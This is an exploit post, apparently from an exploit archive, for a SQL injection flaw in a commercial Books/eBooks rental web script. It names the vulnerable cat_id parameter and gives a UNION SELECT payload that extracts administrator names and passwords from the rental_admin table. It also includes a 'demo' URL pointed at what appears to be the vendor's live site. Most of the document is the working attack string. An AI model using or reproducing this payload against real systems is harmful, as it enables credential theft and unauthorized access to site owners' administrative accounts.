[!] Books/eBooks Rental Software SQL injection Vulnerability
[!] Author : Don Tukulesto (root@indonesiancoder.com)
[!] Homepage : http://www.indonesiancoder.com
[!] Date & Time : Thu Feb 10, 2010 5:55 PM
[!] Rock On : http://antisecradio.fm (choose your weapon)
[ Software Information ]
[+] Vendor : http://www.commodityrentals.com/
[+] Download : n/a
[+] Version() : n/a
[+] Price : n/a
[+] This script is specifically tailored for people wanting to start a Books/E-Books Rentals Business within a very short time.
Fully E-Commerce ready, this system comes with a Books attribute template and a fully customizable “look and feel” template of the site.
[+] Method : SQL Injection
[+] Dork : Don Tukulesto
[ Proof of Concept ]
http://server/index.php?view=gamecatalog&cat_id=[INDONESIAN CODER NOT DEAD WITHOUT YOU]
[ EXPL0!T ]
2+AND+1=2+UNION+SELECT+0,1,concat(admin_name,0x3a,admin_password),3+from+rental_admin–
[ D3M0 ]
http://books.commodityrentals.com/index.php?view=gamecatalog&cat_id=2+AND+1=2+UNION+SELECT+0,1,concat(admin_name,0x3a,admin_password),3+from+rental_admin–
